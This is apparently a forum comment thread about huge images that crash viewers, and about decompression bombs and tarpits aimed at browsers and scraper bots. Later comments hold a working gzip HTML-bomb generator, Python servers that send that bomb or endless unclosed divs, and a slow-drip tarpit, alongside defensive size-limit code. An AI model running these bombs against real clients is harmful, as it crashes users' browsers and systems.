
Back when I was a stupid kid, I once did

    ln -s /dev/zero index.html
on my home page as a joke. Browsers at the time didn't like that: they basically froze, sometimes taking the client system down with them.

Later on, I think browsers started checking for actual content and would abort such requests.
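
In client code the same defense is easy to sketch: stream the body and bail once it passes a sanity limit. An illustrative Python example using the requests library (the URL handling and limit are arbitrary, and this is not how any particular browser actually does it):

    import requests

    LIMIT = 10 * 1024 * 1024  # refuse to read more than 10 MiB

    def bounded_get(url):
        # Stream the response and abort as soon as it exceeds the sanity limit,
        # so an endless /dev/zero-style page can't eat all your memory.
        received = 0
        chunks = []
        with requests.get(url, stream=True, timeout=10) as resp:
            for chunk in resp.iter_content(chunk_size=64 * 1024):
                received += len(chunk)
                if received > LIMIT:
                    raise ValueError("response exceeded size limit, aborting")
                chunks.append(chunk)
        return b"".join(chunks)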



I made a 64k x 64k JPEG once by feeding the encoder the same line of macroblocks until it produced the entire image.

Years later I was finally able to open it.


I had a ton of trouble opening a 10MB or so PNG a few weeks back. It was stitched-together screenshots forming a map of some areas in a game, so it was quite large. Some stuff refused to open it at all as if the file was invalid, some would hang for minutes, some opened it blurry. My first semi-success was Fossify Gallery on my phone from F-Droid. If I let it chug a bit, it'd show a blurry image; a while longer and it'd come into focus. Then I'd try to zoom or pan and it'd blur for ages again. I guess it was aggressively lazy-loading. What worked in the end was GIMP. I had the thought that the image was probably made in an editor, so surely an editor could open it. The catch is that it took like 8GB of RAM, but then I could see clearly, zoom, and pan all I wanted. It made me wonder why there's not an image viewer that's just the viewer part of GIMP or something.

Among the things that didn't work were qutebrowser, IceCat, nsxiv, feh, imv, and mpv. At first I worried the file was corrupt; I was redownloading it, comparing hashes with a friend, etc. Makes for an interesting benchmark, I guess.

For others curious, here's the file: https://0x0.st/82Ap.png

I'd say just curl/wget it, don't expect it to load in a browser.


That's a 36,000x20,000 PNG, 720 megapixels. Many decoders explicitly limit the maximum image area they'll handle, under the reasonable assumption that it would exceed available RAM or take too long to decode, and that such a file was probably crafted maliciously or by mistake.
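
Pillow is one example of such a guard: it has a configurable pixel-count cap (roughly 89 megapixels by default) and raises a DecompressionBombError well before 720 megapixels unless you opt out. A quick sketch, with the filename assumed to be the downloaded map:

    from PIL import Image

    try:
        # 36,000 x 20,000 = 720 MP, far over Pillow's default cap,
        # so this raises DecompressionBombError before decoding.
        img = Image.open("82Ap.png")
        img.load()
    except Image.DecompressionBombError as exc:
        print("refused:", exc)

    # Opting in to huge images means raising or disabling the cap explicitly:
    Image.MAX_IMAGE_PIXELS = None   # or a large value you actually trust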


On Firefox on Android on my pretty old phone, a blurry preview rendered in about 10 seconds, and it was fully rendered in 20 something seconds. Smooth panning and zooming the entire time


Firefox on a Samsung S23 Ultra did it a few seconds faster but otherwise the same experience


Following up with Firefox on S24 Ultra loaded from blank to image in a second and then could zoom right in fine with no blurriness or stuttering at all!


I use Honeyview for reading comics etc. It can handle this.

Old-school ACDSee would have been fine too.

I think it's all the pixel processing in the modern image viewers (or they're just using system web views that aren't 100% a straight render).

I suspect that the more native renderers are doing some extra magic here. Or just being significantly more OK with using up all your RAM.


It loads in about 5 seconds on an iPhone 12 using Safari.

It also pans and zooms swiftly


Same, right up until I zoomed in and waited for Safari to produce a higher resolution render.

Partially zoomed in was fine, but zooming to maximum fidelity resulted in the tab crashing (it was completely responsive until the crash). Looks like Safari does some pretty smart progressive rendering, but forcing it to render the image at full resolution (by zooming in) causes the render to get OOMed or similar.


I remember that years ago (mobile) Safari would aggressively use GPU layers and crash if you ran out of GPU memory. Maybe that's still happening?

Preview on a mac handles the file fine.


How strange, took at least 30s to load on my iPhone 12 Pro Max with Safari but it was smooth to pan and zoom after. Which is way better than my 16 core 64GB RAM Windows machine where both Chrome and Edge gave up very quickly, with a "broken thumbnail" icon.


Probably because they're based on the same engine.


The strangeness was that 2 iPhones from the same generation would exhibit such different performance behaviors, and in parallel the irony that a desktop browser (engine irrelevant) on a device with cutting edge performance can't do what a phone does.


IrfanView was able to load it in about 8 seconds (Ryzen 7 5800x) using 2.8GB of RAM, but zooming/panning is quite slow (~500ms per action)


IrfanView on my PC is very fast. Zoomed to 100% I can pan around no problem. Is it using CPU or GPU? I've got an 11900K CPU and RTX 3090.


There are fast and slow resample viewing options in IrfanView; he may have the slow one turned on for higher quality.


Firefox on a mid-tier Samsung and a cheapo data connection (4G) took about 30s to load. I could pan, but it limited me from zooming much, and the little I could zoom in looked quite blurry.


For what it's worth, this loaded (slowly) in Firefox on Windows for me (but zooming was blurry), and the default Photos viewer opened it no problem with smooth zooming and panning.


On my Waterfox 6.5.6, it opened but remained blurry when zoomed in. MS Paint refused to open it. The GIMP v2.99.18 crashed and took my display driver with it. Windows 10 Photo Viewer surprisingly managed to open it and keep it sharp when zoomed in. The GIMP v3.0.2 (latest version at the time of writing) crashed.


Safari on my MacBook Air opened it fine, though it took about four seconds. Zooming works fine as well. It does take ~3GB of memory according to Activity Monitor.


ImgurViewer from F-Droid on an FP5 opened it blurry after around 5s, and 5s later it was rendered completely.

Pan&zoom works instantly with a blurry preview and then takes another 5-10s to render completely.


> don't expect it to load in a browser

Takes a few seconds, but otherwise seems pretty ok in desktop Safari. Preview.app also handles it fine (albeit does allocate an extra ~1-2GB of RAM)


Interestingly enough, it loads in about 5 seconds on my Pixel 6a.


Loads fine and fairly quickly on a Macbook Pro M3 Pro with Firefox 137. Does have a bit of delay when initially zooming in, but pans and zooms fine after.


Works fine on my 5 year old iPad Pro with an A12 processor.


PDF files with embedded vector-based layers, e.g. plans or maps of large areas, are also quite difficult to render/open.


Just today a colleague was looking at some air-traffic permit map in a PDF that was around 12MB. He complained that Adobe Reader changed something so he can't pan/zoom anymore.

I suggested trying the HN-beloved Sumatra PDF. Ugh, it couldn't cope with it properly. Chrome coped better.


Loading this on my iPhone on 1gbit took about 5s and I can easily pan and zoom. A desktop should handle it beautifully.


It loaded after 10-15 seconds on my iPad Pro M1, although it did start reloading after I looked around in it.


It loads in about 10 seconds in Safari on an M1 Air. I think I am spoiled.


Oh hey it's the thing that ruins an otherwise okay rhythm game.


I get a "Your connection was interrupted" error in Chrome.


On mobile, Brave just displayed it as the placeholder broken-link image, but in Firefox it loaded in about 10s.


qView opens this easily enough.


Opens fine in Firefox 138.


Safari on iPhone did a good job with it actually lol


I once encoded an entire TV OP into a multi-megabyte animated cursor (.ani) file.

Surprisingly, Windows 95 didn't die trying to load it, but quite a lot of operations in the system took noticeably longer than they normally did.


I wonder if I could create a 500TB HTML file with proper headers on a squashfs, an endless <div><div><div>... with no closing tags, and if I could instruct the server not to report the file size before download.

Any ideas?


Why use squashfs when you can do the same as OP did and serve a compressed version, so that the client is overwhelmed by both the decompression and the DOM depth:

    yes "<div>" | dd bs=1M count=10240 iflag=fullblock | gzip | pv > zipdiv.gz

The resulting file is about 15 MiB and decompresses into a 10 GiB monstrosity containing 1,789,569,706 unclosed nested divs.
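
Serving it so the client does the inflating is the other half. A minimal sketch, assuming the zipdiv.gz from above and an arbitrary port; the trick is just sending the precompressed bytes with a Content-Encoding: gzip header:

    from http.server import BaseHTTPRequestHandler, HTTPServer

    # ~15 MiB on disk, ~10 GiB once the client inflates it
    BOMB = open("zipdiv.gz", "rb").read()

    class Bomb(BaseHTTPRequestHandler):
        def do_GET(self):
            # Claim the body is ordinary gzip-compressed HTML; the client's
            # own decoder then pays for the 10 GiB expansion, not the server.
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Encoding", "gzip")
            self.send_header("Content-Length", str(len(BOMB)))
            self.end_headers()
            self.wfile.write(BOMB)

    HTTPServer(("0.0.0.0", 8080), Bomb).serve_forever()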


You can also just use code to endlessly serve up something.

Also, you can reverse many DoS vectors, depending on your setup and costs. For example, a reverse Slowloris attack to use up their connections.


I like it. :)


This is beautiful


Yes, servers can respond without specifying the size by using chunked encoding. And you can do the rest with a custom web server that just handles requests by returning "<div>" in a loop. I have no idea if browsers are vulnerable to such a thing.
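
For illustration, a bare-bones version of such a server in Python (raw sockets, made-up port), streaming "<div>" forever with Transfer-Encoding: chunked so no length is ever announced:

    import socket

    CHUNK = b"<div>" * 1024  # 5 KiB of unclosed divs per chunk

    with socket.create_server(("0.0.0.0", 8080)) as srv:
        while True:
            conn, _ = srv.accept()
            with conn:
                conn.recv(4096)  # read and ignore whatever was requested
                conn.sendall(
                    b"HTTP/1.1 200 OK\r\n"
                    b"Content-Type: text/html\r\n"
                    b"Transfer-Encoding: chunked\r\n\r\n"
                )
                try:
                    # Each chunk: hex length, CRLF, payload, CRLF -- forever.
                    while True:
                        conn.sendall(b"%x\r\n%s\r\n" % (len(CHUNK), CHUNK))
                except (BrokenPipeError, ConnectionResetError):
                    pass  # the client gave up (or fell over)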


I just tested it via a small Python script sending divs at ~900 MB/s (as measured by curl). Firefox just kills the request after 1-2 GB received (~2 seconds) with an "out of memory" error, while Chrome seems to only receive around 1 MB/s, uses one CPU core at 100%, and grows infinitely in memory use. I killed it after 3 minutes with it consuming ca. 6GB (on top of the memory it used at startup).


What did the bots do?


I would make it an invisible link from the main page (hidden behind a logo or something). Users won't click it, but bots will.


the problem with this is that for a tarpit, you don't just want to make it expensive for bots, you also want to make it cheap for yourself. this isn't cheap for you. a zip bomb is.


Right, so an invisible link + a zipbomb is da bomb.


maybe, maybe not. it's one tool at your disposal. it's easy to guard against zip bombs if you know about them - the question is, how thorough are the bot devs you're targeting?

there are other techniques. for example: hold a connection open and only push out a few bytes every few seconds - whether that's cheap for you or not depends on your server's concurrency model (if it's 1 OS thread per connection, then you'd DoS yourself with this - but with an evented model you should be good). if the bot analyzes images or pdfs you could try toxic files that exploit known weaknesses which lead to memory corruption to crash them; depends on the bot's capabilities and used libraries of course.
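
A rough sketch of that slow-drip idea with an evented model (Python asyncio here; the port and timings are arbitrary), so each stalled bot costs you one coroutine rather than one OS thread:

    import asyncio

    async def tarpit(reader, writer):
        writer.write(b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n")
        try:
            while True:
                writer.write(b"<div>")   # a handful of bytes...
                await writer.drain()
                await asyncio.sleep(5)   # ...every few seconds, forever
        except ConnectionError:
            pass                         # the bot hung up or crashed
        finally:
            writer.close()

    async def main():
        server = await asyncio.start_server(tarpit, "0.0.0.0", 8080)
        async with server:
            await server.serve_forever()

    asyncio.run(main())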


Sounds like the favicon.ico that would crash the browser.

I think this was it:

https://freedomhacker.net/annoying-favicon-crash-bug-firefox...


Looks like something I should add for my web APIs which are to be queried only by clients aware of the API specification.


I hope you weren’t paying for bandwidth by the KiB.


Nah, back then we paid for bandwidth by the kb.


That’s even worse! :)


Maybe it's time for a /dev/zipbomb device.


    ln -s /dev/urandom /dev/zipbomb && echo 'Boom!'

Ok, not a real zip bomb, for that we would need a kernel module.


> Ok, not a real zip bomb, for that we would need a kernel module.

Or a userland fusefs program, nice funky idea actually (with configurable dynamic filenames, e.g. `mnt/10GiB_zeropattern.zip`...)
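
Something along those lines, sketched with the third-party fusepy package: a read-only mount exposing one fake file of a configured size whose reads return zeros. The filename, mountpoint, and size are made up, and this doesn't emit real zip structure, just an arbitrarily large, maximally compressible file that occupies no disk space:

    import errno
    import stat
    from fuse import FUSE, FuseOSError, Operations  # pip install fusepy

    FNAME = "10GiB_zeropattern.zip"    # the "configurable dynamic filename"
    SIZE = 10 * 1024**3                # pretend to be 10 GiB

    class ZeroPattern(Operations):
        def getattr(self, path, fh=None):
            if path == "/":
                return dict(st_mode=(stat.S_IFDIR | 0o755), st_nlink=2)
            if path == "/" + FNAME:
                return dict(st_mode=(stat.S_IFREG | 0o444), st_nlink=1,
                            st_size=SIZE)
            raise FuseOSError(errno.ENOENT)

        def readdir(self, path, fh):
            return [".", "..", FNAME]

        def read(self, path, size, offset, fh):
            # Every read is just zeros, trimmed at the advertised end of file.
            return b"\0" * max(0, min(size, SIZE - offset))

    if __name__ == "__main__":
        FUSE(ZeroPattern(), "mnt", foreground=True, ro=True)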


That costs you a lot of bandwidth, defeating the whole point of a zip bomb.


Wait, you set up a symlink?

I am not sure how that could’ve worked. Unless the real /dev tree was exposed to your webserver’s chroot environment, this would’ve given nothing special except “file not found”.

The whole point of chroot for a webserver was to shield clients from accessing special files like that!


You yourself explain how it could've worked: Plenty of webservers are or were not chroot'ed.


Which means that if your bot is getting slammed by this, you can assume it's not chrooted and hence a more likely target for attack.


This does not logically follow. If your bot is getting slammed by a page returning all zeros (what the person I replied to reacted to), all you know is something on the server is returning a neverending stream of zeros. A symlink to /dev/zero is an easy way of doing that, but knowing the server is serving up a neverending stream of zeros by no means tells you whether the server is running in a decently isolated environment or not.

Even if you knew it was done with a symlink you don't know that - these days odds are it'd run in a container or vm, and so having access to /dev/zero means very little.


Could server-side includes be used for an HTML bomb?

Write an ordinary static HTML page and fill a <p> with infinite random data using <!--#include file="/dev/random"-->.

Or would that crash the server?


I guess it depends on the server's implementation. But since you need some logic to decide when to serve the HTML bomb anyway, I don't see why you would prefer this solution. Just use whatever script you're using to detect the bots to serve the bomb.


No other scripts. Hide the link to the bomb behind an image so humans can't click it.


My first thought is how this would interact with things like screen readers and other accessibility devices


Don’t screen readers ignore invisible text/links?


Divide by zero happens to everyone eventually.

https://medium.com/@bishr_tabbaa/when-smart-ships-divide-by-...

"On 21 September 1997, the USS Yorktown halted for almost three hours during training maneuvers off the coast of Cape Charles, Virginia due to a divide-by-zero error in a database application that propagated throughout the ship’s control systems."

" technician tried to digitally calibrate and reset the fuel valve by entering a 0 value for one of the valve’s component properties into the SMCS Remote Database Manager (RDM)"


I remember reading about that some years ago. It involved Windows NT.

https://www.google.com/search?q=windows+nt+bug+affects+ship


Bad bot


We discovered back when IE3 came out that you could crash Windows by leaving off a table closing tag.



